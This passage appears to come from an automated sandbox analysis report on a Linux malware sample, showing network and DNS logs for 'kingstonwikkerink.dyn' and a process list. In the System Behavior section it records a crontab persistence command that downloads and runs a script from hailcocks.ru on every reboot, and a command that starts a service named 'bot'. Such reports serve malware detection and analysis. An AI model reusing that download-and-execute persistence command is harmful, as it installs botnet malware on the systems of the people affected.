                                                                          Oct 26, 2024 19:18:26.518765926 CEST112994549291.149.218.232192.168.2.15
                                                                          Oct 26, 2024 19:18:26.518960953 CEST4549211299192.168.2.1591.149.218.232
                                                                          Oct 26, 2024 19:19:46.598206043 CEST4549211299192.168.2.1591.149.218.232
                                                                          Oct 26, 2024 19:19:46.788597107 CEST112994549291.149.218.232192.168.2.15
                                                                          Oct 26, 2024 19:19:47.033083916 CEST112994549291.149.218.232192.168.2.15
                                                                          Oct 26, 2024 19:19:47.033318996 CEST4549211299192.168.2.1591.149.218.232
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 26, 2024 19:17:47.893155098 CEST5535853192.168.2.15194.36.144.87
                                                                          Oct 26, 2024 19:17:47.903624058 CEST5355358194.36.144.87192.168.2.15
                                                                          Oct 26, 2024 19:17:48.023139954 CEST5422753192.168.2.15194.36.144.87
                                                                          Oct 26, 2024 19:17:48.033736944 CEST5354227194.36.144.87192.168.2.15
                                                                          Oct 26, 2024 19:17:49.218113899 CEST5331453192.168.2.158.8.8.8
                                                                          Oct 26, 2024 19:17:49.218113899 CEST4263053192.168.2.158.8.8.8
                                                                          Oct 26, 2024 19:17:49.224890947 CEST53426308.8.8.8192.168.2.15
                                                                          Oct 26, 2024 19:17:49.225999117 CEST53533148.8.8.8192.168.2.15
                                                                          Oct 26, 2024 19:17:53.924577951 CEST4868153192.168.2.15194.36.144.87
                                                                          Oct 26, 2024 19:17:53.935691118 CEST5348681194.36.144.87192.168.2.15
                                                                          Oct 26, 2024 19:17:59.825757027 CEST5072053192.168.2.15139.84.165.176
                                                                          Oct 26, 2024 19:18:04.832416058 CEST3660753192.168.2.1580.152.203.134
                                                                          Oct 26, 2024 19:18:04.862667084 CEST533660780.152.203.134192.168.2.15
                                                                          Oct 26, 2024 19:18:11.215120077 CEST5676353192.168.2.1564.176.6.48
                                                                          Oct 26, 2024 19:18:16.222214937 CEST4820753192.168.2.1565.21.1.106
                                                                          Oct 26, 2024 19:18:16.250895023 CEST534820765.21.1.106192.168.2.15
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Oct 26, 2024 19:17:47.893155098 CEST192.168.2.15194.36.144.870xd114Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:49.218113899 CEST192.168.2.158.8.8.80xdf28Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:49.218113899 CEST192.168.2.158.8.8.80x81b7Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.924577951 CEST192.168.2.15194.36.144.870x3926Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:59.825757027 CEST192.168.2.15139.84.165.1760x63aeStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.832416058 CEST192.168.2.1580.152.203.1340x2510Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:11.215120077 CEST192.168.2.1564.176.6.480xb89cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.222214937 CEST192.168.2.1565.21.1.1060xe882Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:47.903624058 CEST194.36.144.87192.168.2.150xd114No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:49.225999117 CEST8.8.8.8192.168.2.150xdf28No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:49.225999117 CEST8.8.8.8192.168.2.150xdf28No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:17:53.935691118 CEST194.36.144.87192.168.2.150x3926No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:04.862667084 CEST80.152.203.134192.168.2.150x2510No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                          Oct 26, 2024 19:18:16.250895023 CEST65.21.1.106192.168.2.150xe882No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false

                                                                          System Behavior

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/tmp/nsharm7.elf
                                                                          Arguments:/tmp/nsharm7.elf
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/tmp/nsharm7.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/bin/sh
                                                                          Arguments:/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/usr/bin/crontab
                                                                          Arguments:crontab -l
                                                                          File size:43720 bytes
                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/usr/bin/crontab
                                                                          Arguments:crontab -
                                                                          File size:43720 bytes
                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/tmp/nsharm7.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/bin/sh
                                                                          Arguments:/bin/sh -c "/sbin/initctl start bot"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/tmp/nsharm7.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/tmp/nsharm7.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):17:17:46
                                                                          Start date (UTC):26/10/2024
                                                                          Path:/tmp/nsharm7.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1